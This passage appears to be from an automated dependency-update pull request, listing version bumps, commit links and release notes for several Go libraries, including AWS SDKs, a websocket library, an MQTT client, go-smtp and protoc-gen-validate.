href=\"https://github.com/aws/aws-sdk-go/commit/070853e88d22854d2355c2543d0958a5f76ad407\"\u003e\u003ccode\u003e070853e\u003c/code\u003e\u003c/a\u003e release v1.55.8 (2025-07-31)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/bb0168ecfa52f8809b27912ded94edafaa019512\"\u003e\u003ccode\u003ebb0168e\u003c/code\u003e\u003c/a\u003e Add deprecation warnings everywhere and remove some README content\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/7ce44f3b563e6c00488bc9c81fb12ef232d72d93\"\u003e\u003ccode\u003e7ce44f3\u003c/code\u003e\u003c/a\u003e aws\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/6d9a26d85968c06f7e83b3233c5454b93c1ccfd8\"\u003e\u003ccode\u003e6d9a26d\u003c/code\u003e\u003c/a\u003e remove doc issue tmpl\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/239002f260fd543fe03fbd154d3033777d2bcd30\"\u003e\u003ccode\u003e239002f\u003c/code\u003e\u003c/a\u003e deprecate service packages and HLLs\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/70c4177b8fdf98fa35e7286fd7881276d7490540\"\u003e\u003ccode\u003e70c4177\u003c/code\u003e\u003c/a\u003e deprecate main runtime packages\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/bbdd4e9bc5e4f2795f25486b84b202d689efc632\"\u003e\u003ccode\u003ebbdd4e9\u003c/code\u003e\u003c/a\u003e deprecate\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/aws/aws-sdk-go/compare/v1.55.7...v1.55.8\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/config` from 1.29.12 to 1.32.13\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/90650dd22735ab68f6089ae5c39b6614286ae9ec\"\u003e\u003ccode\u003e90650dd\u003c/code\u003e\u003c/a\u003e Release 2026-03-26\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/dd88818bee7d632a8b9da6e2c78ef92e23c94c62\"\u003e\u003ccode\u003edd88818\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/b662c50138bd393927871b46e84ee3483377f5be\"\u003e\u003ccode\u003eb662c50\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/500a9cb3522a0e71d798d7079ff5856b23c2cac1\"\u003e\u003ccode\u003e500a9cb\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/6221102f763bd65d7e403fa62c3a1e3d39e24dc6\"\u003e\u003ccode\u003e6221102\u003c/code\u003e\u003c/a\u003e fix stale skew and delayed skew healing (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3359\"\u003e#3359\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/0a39373433a121800bc68efa743a7486eb07aa3f\"\u003e\u003ccode\u003e0a39373\u003c/code\u003e\u003c/a\u003e fix order of generated event header handlers (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3361\"\u003e#3361\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/098f3898271e2eaaf8a92e38d1d928fb018805a6\"\u003e\u003ccode\u003e098f389\u003c/code\u003e\u003c/a\u003e Only generate resolveAccountID when it's required (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3360\"\u003e#3360\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/6ebab66428e97db0ee252fea042d56b1313cb9f6\"\u003e\u003ccode\u003e6ebab66\u003c/code\u003e\u003c/a\u003e Release 2026-03-25\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/b2ec3beebb986a5e74e50d0c105119d84e1e934e\"\u003e\u003ccode\u003eb2ec3be\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/abc126f6b35bfe2f77e2505f6d04f8ceced971ee\"\u003e\u003ccode\u003eabc126f\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/config/v1.29.12...config/v1.32.13\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/service/s3` from 1.78.2 to 1.97.3\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/90650dd22735ab68f6089ae5c39b6614286ae9ec\"\u003e\u003ccode\u003e90650dd\u003c/code\u003e\u003c/a\u003e Release 2026-03-26\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/dd88818bee7d632a8b9da6e2c78ef92e23c94c62\"\u003e\u003ccode\u003edd88818\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/b662c50138bd393927871b46e84ee3483377f5be\"\u003e\u003ccode\u003eb662c50\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/500a9cb3522a0e71d798d7079ff5856b23c2cac1\"\u003e\u003ccode\u003e500a9cb\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/6221102f763bd65d7e403fa62c3a1e3d39e24dc6\"\u003e\u003ccode\u003e6221102\u003c/code\u003e\u003c/a\u003e fix stale skew and delayed skew healing (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3359\"\u003e#3359\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/0a39373433a121800bc68efa743a7486eb07aa3f\"\u003e\u003ccode\u003e0a39373\u003c/code\u003e\u003c/a\u003e fix order of generated event header handlers (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3361\"\u003e#3361\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/098f3898271e2eaaf8a92e38d1d928fb018805a6\"\u003e\u003ccode\u003e098f389\u003c/code\u003e\u003c/a\u003e Only generate resolveAccountID when it's required (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3360\"\u003e#3360\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/6ebab66428e97db0ee252fea042d56b1313cb9f6\"\u003e\u003ccode\u003e6ebab66\u003c/code\u003e\u003c/a\u003e Release 2026-03-25\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/b2ec3beebb986a5e74e50d0c105119d84e1e934e\"\u003e\u003ccode\u003eb2ec3be\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/abc126f6b35bfe2f77e2505f6d04f8ceced971ee\"\u003e\u003ccode\u003eabc126f\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/service/s3/v1.78.2...service/s3/v1.97.3\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/coder/websocket` from 1.8.13 to 1.8.14\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/coder/websocket/releases\"\u003egithub.com/coder/websocket's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.8.14\u003c/h2\u003e\n\u003ch2\u003eChanges\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: match Origin scheme if defined in OriginPatterns by \u003ca href=\"https://github.com/mafredri\"\u003e\u003ccode\u003e@​mafredri\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/coder/websocket/pull/536\"\u003ecoder/websocket#536\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003erefactor: use \u003ccode\u003econtext.AfterFunc\u003c/code\u003e to track timeouts instead of goroutine by \u003ca href=\"https://github.com/ash2k\"\u003e\u003ccode\u003e@​ash2k\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/coder/websocket/pull/532\"\u003ecoder/websocket#532\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003erefactor: add \u003ccode\u003eErrMessageTooBig\u003c/code\u003e sentinel error for limited reads by \u003ca href=\"https://github.com/DanielleMaywood\"\u003e\u003ccode\u003e@​DanielleMaywood\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/coder/websocket/pull/535\"\u003ecoder/websocket#535\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild: update to Go 1.23 by \u003ca href=\"https://github.com/mafredri\"\u003e\u003ccode\u003e@​mafredri\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/coder/websocket/pull/524\"\u003ecoder/websocket#524\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild: add Makefile by \u003ca href=\"https://github.com/mafredri\"\u003e\u003ccode\u003e@​mafredri\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/coder/websocket/pull/525\"\u003ecoder/websocket#525\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore: update LICENSE file by \u003ca href=\"https://github.com/mtojek\"\u003e\u003ccode\u003e@​mtojek\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/coder/websocket/pull/526\"\u003ecoder/websocket#526\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore: apply various modernisations by \u003ca href=\"https://github.com/Jacalz\"\u003e\u003ccode\u003e@​Jacalz\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/coder/websocket/pull/531\"\u003ecoder/websocket#531\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mtojek\"\u003e\u003ccode\u003e@​mtojek\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/coder/websocket/pull/526\"\u003ecoder/websocket#526\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ash2k\"\u003e\u003ccode\u003e@​ash2k\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/coder/websocket/pull/532\"\u003ecoder/websocket#532\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/DanielleMaywood\"\u003e\u003ccode\u003e@​DanielleMaywood\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/coder/websocket/pull/535\"\u003ecoder/websocket#535\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/coder/websocket/compare/v1.8.13...v1.8.14\"\u003ehttps://github.com/coder/websocket/compare/v1.8.13...v1.8.14\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/coder/websocket/commit/7d7c644330e727379c3e33fddc154ac208b925f3\"\u003e\u003ccode\u003e7d7c644\u003c/code\u003e\u003c/a\u003e refactor: add \u003ccode\u003eErrMessageTooBig\u003c/code\u003e sentinel error for limited reads (\u003ca href=\"https://redirect.github.com/coder/websocket/issues/535\"\u003e#535\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/coder/websocket/commit/c7846ea6a8849fe21aed3b8319bac906e8cb1dca\"\u003e\u003ccode\u003ec7846ea\u003c/code\u003e\u003c/a\u003e refactor: use \u003ccode\u003econtext.AfterFunc\u003c/code\u003e to track timeouts instead of goroutine (\u003ca href=\"https://redirect.github.com/coder/websocket/issues/532\"\u003e#532\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/coder/websocket/commit/e11dd4e741173381256344d57b3bfc3fa38a9d25\"\u003e\u003ccode\u003ee11dd4e\u003c/code\u003e\u003c/a\u003e fix: match Origin scheme if defined in OriginPatterns (\u003ca href=\"https://redirect.github.com/coder/websocket/issues/536\"\u003e#536\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/coder/websocket/commit/91013c129147ee6375b65cf150fa151d2fcc0bce\"\u003e\u003ccode\u003e91013c1\u003c/code\u003e\u003c/a\u003e chore: apply various modernisations (\u003ca href=\"https://redirect.github.com/coder/websocket/issues/531\"\u003e#531\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/coder/websocket/commit/efb626be44240d7979b57427265d9b6402166b96\"\u003e\u003ccode\u003eefb626b\u003c/code\u003e\u003c/a\u003e chore: update LICENSE file (\u003ca href=\"https://redirect.github.com/coder/websocket/issues/526\"\u003e#526\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/coder/websocket/commit/246891f172ef96b0b5681c8e4d59dfd32ad1b091\"\u003e\u003ccode\u003e246891f\u003c/code\u003e\u003c/a\u003e build: add Makefile (\u003ca href=\"https://redirect.github.com/coder/websocket/issues/525\"\u003e#525\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/coder/websocket/commit/778d161bfd21f3cfa8052d8b84e8c86e08ce41c7\"\u003e\u003ccode\u003e778d161\u003c/code\u003e\u003c/a\u003e build: update to Go 1.23 (\u003ca href=\"https://redirect.github.com/coder/websocket/issues/524\"\u003e#524\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/coder/websocket/compare/v1.8.13...v1.8.14\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/eclipse/paho.mqtt.golang` from 1.5.0 to 1.5.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/eclipse/paho.mqtt.golang/releases\"\u003egithub.com/eclipse/paho.mqtt.golang's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.5.1\u003c/h2\u003e\n\u003cp\u003eThis is a minor release incorporating changes made in the 14 months since v1.5.0 (including updating dependencies, and raising the Go version to 1.24). The changes are relatively minor but address a potential security issue (\u003ca href=\"https://www.cve.org/CVERecord?id=CVE-2025-10543\"\u003eCVE-2025-10543\u003c/a\u003e), possible panic, enable users to better monitor the connection status, and incorporate a few optimisations.\u003c/p\u003e\n\u003cp\u003eThanks to those who have provided fixes/enhancements included in this release!\u003c/p\u003e\n\u003cp\u003eSpecial thanks to Paul Gerste at \u003ca href=\"https://www.sonarsource.com/\"\u003eSonar\u003c/a\u003e for reporting issue \u003ca href=\"https://redirect.github.com/eclipse/paho.mqtt.golang/issues/730\"\u003e#730\u003c/a\u003e via the Eclipse security team (fix was implemented in PR \u003ca href=\"https://redirect.github.com/eclipse/paho.mqtt.golang/issues/714\"\u003e#714\u003c/a\u003e in May, github issue created just prior to this release). This issue arose where a topic \u0026gt; 65535 bytes was passed to the \u003ccode\u003ePublish\u003c/code\u003e function, due to the way the data was encoded the topic could leak into the message body. Please see issue \u003ca href=\"https://redirect.github.com/eclipse/paho.mqtt.golang/issues/730\"\u003e#730\u003c/a\u003e or \u003ca href=\"https://www.cve.org/CVERecord?id=CVE-2025-10543\"\u003eCVE-2025-10543\u003c/a\u003e for further details.\u003c/p\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpdating go dependencies from pub and sub into the containers before building by \u003ca href=\"https://github.com/JefJrFigueiredo\"\u003e\u003ccode\u003e@​JefJrFigueiredo\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/eclipse-paho/paho.mqtt.golang/pull/691\"\u003eeclipse-paho/paho.mqtt.golang#691\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eOptimize TCP connection logic by \u003ca href=\"https://github.com/geekeryy\"\u003e\u003ccode\u003e@​geekeryy\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/eclipse-paho/paho.mqtt.golang/pull/713\"\u003eeclipse-paho/paho.mqtt.golang#713\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFields over 65535 bytes not encoded correctly by \u003ca href=\"https://github.com/MattBrittan\"\u003e\u003ccode\u003e@​MattBrittan\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/eclipse-paho/paho.mqtt.golang/pull/714\"\u003eeclipse-paho/paho.mqtt.golang#714\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eReduce slice allocations in route dispatch  by \u003ca href=\"https://github.com/alespour\"\u003e\u003ccode\u003e@​alespour\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/eclipse-paho/paho.mqtt.golang/pull/710\"\u003eeclipse-paho/paho.mqtt.golang#710\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd a ConnectionNotificationHandler by \u003ca href=\"https://github.com/RangelReale\"\u003e\u003ccode\u003e@​RangelReale\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/eclipse-paho/paho.mqtt.golang/pull/727\"\u003eeclipse-paho/paho.mqtt.golang#727\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ePotential panic when using manual ACK by \u003ca href=\"https://github.com/MattBrittan\"\u003e\u003ccode\u003e@​MattBrittan\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/eclipse-paho/paho.mqtt.golang/pull/729\"\u003eeclipse-paho/paho.mqtt.golang#729\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/eclipse-paho/paho.mqtt.golang/compare/v1.5.0...v1.5.1\"\u003ehttps://github.com/eclipse-paho/paho.mqtt.golang/compare/v1.5.0...v1.5.1\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eclipse-paho/paho.mqtt.golang/commit/b30523793968e6b7a7b1f76338a58c4fe9755299\"\u003e\u003ccode\u003eb305237\u003c/code\u003e\u003c/a\u003e Update dependencies in docker examples\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eclipse-paho/paho.mqtt.golang/commit/35ee03d8496f3256cc2bf7af15fea56e21c29c96\"\u003e\u003ccode\u003e35ee03d\u003c/code\u003e\u003c/a\u003e Potential panic when using manual ACK\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eclipse-paho/paho.mqtt.golang/commit/433bd22ae6ac92daf00d575def72e425bc21e39f\"\u003e\u003ccode\u003e433bd22\u003c/code\u003e\u003c/a\u003e address data race in test\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eclipse-paho/paho.mqtt.golang/commit/4debe3a76a5aa8f27a2616e2d4e3fc53be0dc788\"\u003e\u003ccode\u003e4debe3a\u003c/code\u003e\u003c/a\u003e Potential panic when using manual ACK\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eclipse-paho/paho.mqtt.golang/commit/601453b38642642382165ab9689b20cd025d102a\"\u003e\u003ccode\u003e601453b\u003c/code\u003e\u003c/a\u003e Resolve issues in fvt_client_test\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eclipse-paho/paho.mqtt.golang/commit/439e2ab4c07d55c124fe03e8bb6273b93c88b61a\"\u003e\u003ccode\u003e439e2ab\u003c/code\u003e\u003c/a\u003e Dependency update (also rise Go version to 1.24)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eclipse-paho/paho.mqtt.golang/commit/d27659335abe44a2838ac4c8e807dd66ee208ed0\"\u003e\u003ccode\u003ed276593\u003c/code\u003e\u003c/a\u003e ConnectionNotificationHandler - generic callback for all types of connection ...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eclipse-paho/paho.mqtt.golang/commit/8a350a9cff7682fc5d8d741b6e9c5b7def7b2661\"\u003e\u003ccode\u003e8a350a9\u003c/code\u003e\u003c/a\u003e notifications\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eclipse-paho/paho.mqtt.golang/commit/5620c5ed09ab99bde96402f052e548fd95d4e0c3\"\u003e\u003ccode\u003e5620c5e\u003c/code\u003e\u003c/a\u003e notifications\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eclipse-paho/paho.mqtt.golang/commit/45048ccc79f333b4ac41ab1723aa94d63fb5ed01\"\u003e\u003ccode\u003e45048cc\u003c/code\u003e\u003c/a\u003e notifications\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/eclipse/paho.mqtt.golang/compare/v1.5.0...v1.5.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/emersion/go-smtp` from 0.22.0 to 0.24.0\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/emersion/go-smtp/commit/ab24fe7cbe995d404af3b1c093195f2f43b94688\"\u003e\u003ccode\u003eab24fe7\u003c/code\u003e\u003c/a\u003e Remove superfluous validateLine() calls in sendMail()\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/emersion/go-smtp/commit/6944e3381b812d9b418405939b07780809df6c82\"\u003e\u003ccode\u003e6944e33\u003c/code\u003e\u003c/a\u003e Implement MT-PRIORITY (RFC 6710)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/emersion/go-smtp/commit/54dd31d837eeef5d7d699c352bd03a8b4591e5d7\"\u003e\u003ccode\u003e54dd31d\u003c/code\u003e\u003c/a\u003e Implement DELIVERBY (RFC 2852)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/emersion/go-smtp/compare/v0.22.0...v0.24.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/envoyproxy/protoc-gen-validate` from 1.2.1 to 1.3.3\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/envoyproxy/protoc-gen-validate/releases\"\u003egithub.com/envoyproxy/protoc-gen-validate's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.3.3\u003c/h2\u003e\n\u003cp\u003eOne more release attempt to get Python published on PyPI. 😄\u003c/p\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate Python 3.9 references to 3.10 by \u003ca href=\"https://github.com/stefanvanburen\"\u003e\u003ccode\u003e@​stefanvanburen\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bufbuild/protoc-gen-validate/pull/1370\"\u003ebufbuild/protoc-gen-validate#1370\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/bufbuild/protoc-gen-validate/compare/v1.3.2...v1.3.3\"\u003ehttps://github.com/bufbuild/protoc-gen-validate/compare/v1.3.2...v1.3.3\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev1.3.2\u003c/h2\u003e\n\u003cp\u003eFixing the \u003ccode\u003ev1.3.1\u003c/code\u003e release, which was fixing the \u003ccode\u003ev1.3.0\u003c/code\u003e release 😄.\u003c/p\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAttempt to fix release by \u003ca href=\"https://github.com/stefanvanburen\"\u003e\u003ccode\u003e@​stefanvanburen\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bufbuild/protoc-gen-validate/pull/1368\"\u003ebufbuild/protoc-gen-validate#1368\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/bufbuild/protoc-gen-validate/compare/v1.3.1...v1.3.2\"\u003ehttps://github.com/bufbuild/protoc-gen-validate/compare/v1.3.1...v1.3.2\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev1.3.1\u003c/h2\u003e\n\u003cp\u003eThis is a release to get out \u003ca href=\"https://redirect.github.com/bufbuild/protoc-gen-validate/issues/1333\"\u003ePython support for 3.13\u003c/a\u003e, which failed to publish to PyPI in \u003ccode\u003ev1.3.0\u003c/code\u003e.\u003c/p\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eBump the java group across 1 directory with 4 updates by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/bufbuild/protoc-gen-validate/pull/1332\"\u003ebufbuild/protoc-gen-validate#1332\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump actions/checkout from 5 to 6 in the github-actions group by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/bufbuild/protoc-gen-validate/pull/1330\"\u003ebufbuild/protoc-gen-validate#1330\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix Java deployment by \u003ca href=\"https://github.com/pkwarren\"\u003e\u003ccode\u003e@​pkwarren\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bufbuild/protoc-gen-validate/pull/1335\"\u003ebufbuild/protoc-gen-validate#1335\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdate settings.xml to use SONATYPE_USERNAME env var by \u003ca href=\"https://github.com/pkwarren\"\u003e\u003ccode\u003e@​pkwarren\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bufbuild/protoc-gen-validate/pull/1336\"\u003ebufbuild/protoc-gen-validate#1336\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRun deployment with release profile by \u003ca href=\"https://github.com/pkwarren\"\u003e\u003ccode\u003e@​pkwarren\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bufbuild/protoc-gen-validate/pull/1337\"\u003ebufbuild/protoc-gen-validate#1337\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRemove maven settings.xml file by \u003ca href=\"https://github.com/pkwarren\"\u003e\u003ccode\u003e@​pkwarren\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bufbuild/protoc-gen-validate/pull/1338\"\u003ebufbuild/protoc-gen-validate#1338\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump the java group in /java with 2 updates by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/bufbuild/protoc-gen-validate/pull/1334\"\u003ebufbuild/protoc-gen-validate#1334\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump the github-actions group with 2 updates by \u003ca 